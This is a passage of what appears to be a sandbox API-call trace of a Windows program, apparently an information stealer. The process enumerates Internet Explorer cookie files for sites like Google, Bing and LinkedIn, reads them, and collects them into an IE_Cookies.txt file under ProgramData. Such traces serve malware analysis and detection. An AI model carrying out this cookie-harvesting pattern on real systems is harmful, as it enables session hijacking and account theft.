dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53c70990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53c70990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x53c70990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x52, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@adtr02[1].txt", cAlternateFileName="5P5NRG~3.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c91638 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0xfc) returned 0x7ce0328 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0220 | out: hHeap=0x6c90000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0200 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x517fd8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51332930, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x51332930, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x125, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@advertising[1].txt", cAlternateFileName="5P5NRG~1.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0258 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c91638 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0258 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54cce0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54cce0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54cce0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@api.bing[2].txt", cAlternateFileName="5P40FC~1.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0258 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0430 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0258 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4611db50, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4611db50, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x4611db50, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", cAlternateFileName="5P74F0~1.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0258 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x16c) returned 0x7ce0488 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0328 | out: hHeap=0x6c90000) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0328 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0258 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x534b4210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x562c6900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x562c6900, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@bing[1].txt", cAlternateFileName="5PBE12~1.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0258 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0380 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0258 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45798350, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45798350, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x45798350, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@c.bing[1].txt", cAlternateFileName="5P5NRG~2.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce03d8 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0258 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03d8 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbdf95770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbdf95770, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbdf95770, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x82, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@c.msn[1].txt", cAlternateFileName="5PB89C~1.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce03d8 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0600 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03d8 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6301df20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63a15b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63a15b40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@doubleclick[2].txt", cAlternateFileName="5P93CC~1.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce03d8 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x214) returned 0x7ce0658 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0488 | out: hHeap=0x6c90000) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0488 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03d8 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61093ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61093ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x61093ba0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@google[1].txt", cAlternateFileName="5P12F9~1.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce03d8 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce04e0 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03d8 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x610b9d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61282d80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x61282d80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@google[3].txt", cAlternateFileName="5P692F~1.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce03d8 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0538 [0136.160] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03d8 | out: hHeap=0x6c90000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e777a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x64e777a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x64e777a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x21f, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@google[4].txt", cAlternateFileName="5P3B8C~1.TXT")) returned 1 [0136.160] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce03d8 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c966e0 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03d8 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x465ba5f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x465ba5f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x465ba5f0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@linkedin[1].txt", cAlternateFileName="5P1C80~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96790 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbfa5cef0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbfa5cef0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbfa5cef0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x76, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", cAlternateFileName="5PD7A3~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c967e8 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50b50050, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50b50050, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x50b50050, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x337, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@msn[1].txt", cAlternateFileName="5PBFF9~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x6c91690 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x310) returned 0x7ce0c78 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0658 | out: hHeap=0x6c90000) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x7ce0f90 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5348e0b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5348e0b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5348e0b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt", cAlternateFileName="5P5NRG~4.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0590 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0658 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf73d210, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6c, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", cAlternateFileName="5P4910~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0590 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce06c0 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf99e810, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf99e810, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf99e810, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x68, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@skadtec[1].txt", cAlternateFileName="5P37A2~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96840 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf54e030, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf54e030, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf54e030, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0xb2, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@track.adform[2].txt", cAlternateFileName="5PD4D3~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0590 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0728 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x555a9a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x555a9a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x555a9a10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@www.bing[2].txt", cAlternateFileName="5PA943~1.TXT")) returned 1 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.161] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96898 [0136.161] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.161] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54d8c7b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54d8c7b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54d8c7b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa9, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", cAlternateFileName="5PC3D9~1.TXT")) returned 1 [0136.162] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0590 [0136.162] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0790 [0136.162] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.162] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4523d1d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x526fc010, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x526fc010, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x402, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@www.msn[2].txt", cAlternateFileName="5PD551~1.TXT")) returned 1 [0136.162] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.162] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c968f0 [0136.162] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.162] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4523d1d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x526fc010, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x526fc010, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x402, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@www.msn[2].txt", cAlternateFileName="5PD551~1.TXT")) returned 0 [0136.162] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c91380, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0136.162] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x2e) returned 0x7ce0048 [0136.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c91380, cbMultiByte=23, lpWideCharStr=0x7ce0048, cchWideChar=23 | out: lpWideCharStr="Cookies\\IE_Cookies.txt") returned 23 [0136.162] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c91690 [0136.162] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0048 | out: hHeap=0x6c90000) returned 1 [0136.163] CreateFileW (lpFileName="Cookies\\IE_Cookies.txt" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\cookies\\ie_cookies.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x18d4f8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0136.163] GetFileType (hFile=0x344) returned 0x1 [0136.164] SetFilePointer (in: hFile=0x344, lDistanceToMove=-1, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0136.164] GetLastError () returned 0x83 [0136.164] GetLastError () returned 0x83 [0136.164] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c913a8 | out: hHeap=0x6c90000) returned 1 [0136.164] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x2) returned 0x6c913a8 [0136.164] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x7ce02b0 [0136.164] GetLastError () returned 0x83 [0136.164] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.165] GetFileType (hFile=0x340) returned 0x1 [0136.165] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x8) returned 0x6c91310 [0136.165] GetLastError () returned 0x0 [0136.166] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x66, lpOverlapped=0x0) returned 1 [0136.167] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce03e8 [0136.167] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x6c915d0 [0136.167] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x6c915f8 [0136.168] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce0590 [0136.168] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce05b8 [0136.168] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.168] GetLastError () returned 0x0 [0136.168] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.169] CloseHandle (hObject=0x340) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915f8 | out: hHeap=0x6c90000) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91750 | out: hHeap=0x6c90000) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0fd8 | out: hHeap=0x6c90000) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x6c915d0 [0136.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 